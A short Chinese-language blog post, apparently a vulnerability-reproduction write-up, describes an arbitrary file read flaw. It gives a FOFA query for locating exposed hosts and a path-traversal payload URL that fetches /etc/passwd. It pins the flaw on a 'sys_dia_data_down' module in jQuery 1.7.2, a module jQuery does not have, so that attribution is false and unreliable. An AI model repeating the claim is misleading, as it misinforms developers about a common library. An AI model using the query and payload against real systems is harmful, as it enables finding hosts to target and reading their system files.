赞
踩
jQuery-1.7.2 版本存在任意文件读取漏洞,攻击者可通过特定URL地址访问并获取敏感信息。
本篇文章仅作为漏洞复现和技术研究,切勿将攻击手法用于非授权下的渗透攻击行为,出现任何后果与本文作者无关,切记!!!
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后一个优秀的JavaScript代码库(框架) 于2006年1月由John Resig发布。
jQuery设计的宗旨是 " write Less,Do More" ,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、时间处理、动画设计和Ajax交互。
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其 1.7.2 版本的sys_dia_data_down
模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
FOFA: body=“webui/js/jquerylib/jquery-1.7.2.min.js”
Payload:http://127.0.0.1/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd
访问链接下载敏感文件
验证工具下载:前往下载
厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:https://jquery.com/
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。